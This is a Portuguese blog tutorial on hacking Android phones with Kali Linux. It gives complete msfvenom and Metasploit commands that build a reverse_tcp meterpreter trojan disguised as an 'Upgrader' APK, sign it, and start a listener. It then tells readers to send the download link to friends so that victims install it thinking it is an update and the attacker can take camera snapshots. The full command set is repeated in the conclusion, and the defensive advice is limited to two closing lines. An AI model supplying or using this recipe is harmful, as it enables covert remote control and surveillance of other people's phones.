Kali Linux é uma distribuição de testes de penetração, frequentemente usada por profissionais, para executar testes de segurança.
Sugiro que os leitores instalem uma cópia do Kali Linux no VirtualBox ou VMware para ataques, em nível de rede, em dispositivos Android. O Kali Linux pode ser baixado do seguinte link:
https://www.kali.org/downloads/
Disclaimer
Muito se pergunta, podemos realmente hackear usando Kali Linux? Não, realmente não. Os exploits incluídos no Kali/Backtrack são mais “amostras de código” do que exploits reais que se podem usar – eles são extremamente inadequados para trabalhar em um sistema corretamente atualizado e protegido, simplesmente porque são de conhecimento público, o que significa que quase tudo já está corrigido com patches contra eles. A maioria deles irá apenas disparar um alarme na rede, e é isso. Você pode ir para a prisão e ser julgado como um hacker, e além do sistema judicial ninguém mais vai pensar que você é um hacker.
Se você deseja exploits apropriados, tem que escrevê-los você mesmo ou pagar por eles. O preço é variável, eu já li que alguns podem custar milhões de dólares (digamos, uma cadeia de exploits, para vulnerabilidades desconhecidas (chamadas “0 days”, porque zero dias se passaram desde que a vulnerabilidade se tornou conhecida publicamente) que permitem que você saia do JavaScript de um site para o modo kernel em vários dispositivos e sistemas operacionais).
No entanto, para hackear, devemos entender completamente o sistema, como os dados são transmitidos, qual protocolo é usado, quais serviços estão sendo executados em diferentes portas.
O segredo é ser um bom observador para considerar cada detalhe, porque os hacks são executados no elo mais fraco não o mais forte.
…e chega de tanto instalar ferramentas, ainda faltam algumas, mas já podemos produzir um pouco e mostrar que o Kali não é tão inocente assim.
Hackeando o Android, remotamente, usando Kali
1 – Inicie o Kali:
Abra um terminal e faça um .apk Cavalo de Tróia.
Você pode fazer isso digitando:
ifconfig (para verificar o seu ip)
msfvenom -p android/meterpreter/reverse_tcp LHOST = 192.168.25.34 R> /root/Upgrader.apk
Você também pode hackear android na WAN, ou seja, através da Internet, usando seu IP público/externo no LHOST e por encaminhamento de porta
Depois o assine-o com d2j-apk-sign (nome do seu arquivo apk).
d2j-apk-sign /root/Upgrader.apk
Agora que você assinou seu apk, ele ganhou o nome Upgrader-signed.apk
2 – Carregue o console metasploit
Digite:
msfconsole
3 – Configurar um ouvinte:
Depois que ele carrega (vai levar tempo), rode o exploit multi-handler digitando:
use exploit/multi/handler
Configure um payload reverso digitando:
set payload android/meterpreter/reverse_tcp
Para definir o L host, digite:
set LHOST 192.168.25.34
(Mesmo se você estiver hackeando em WAN digite seu IP privado/interno aqui, não o público/externo)
4 – Exploit!
Finalmente digite:
exploit
para iniciar o ouvinte.
Faça upload do aplicativo (Upgrader-signed.apk) para Dropbox ou qualquer site de compartilhamento (como: http://www.speedyshare.com).
Em seguida, envie o link que o Website lhe deu para seus amigos e explorar seus telefones (Somente na LAN, mas se você usou o método WAN, então você pode usar o exploit em qualquer lugar na INTERNET)
Deixe a vítima instalar o aplicativo (ele pensa que se destina a atualizar alguns recursos em seu telefone).
Note que a opção de permissão para a instalação de aplicativos de fontes desconhecidas deve ser habilitado a partir das configurações de segurança do android para permitir a instalação do cavalo de Tróia.
E quando ele clica em Abrir …
Você pode, agora, tirar tantos snapshots quanto queira
Hoje, na ansiedade de postar algo, usei um Smartphone Sansung, com apenas uma Câmera, a traseira; no entanto, já testei esta receita com android 6.0.
Dica: isto não se aplica apenas ao android, tente msfvenom -l payloads (lista payloads),
Conclusão:
- Com poucos comandos é possível invadir um smartphone android
msfvenom -p android/meterpreter/reverse_tcp LHOST= {SEU IP} LPORT=4444 R > /root/qualquer.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost SEU IP
set lport 4444
exploit
- Não instale o APK de origem desconhecida.
- Se você realmente deseja instalar APK de fonte desconhecida, verifique se você pode ler e examinar o código-fonte.
Até o próximo post! Se achou útil compartilhe, de um Like e comente.
2 comentários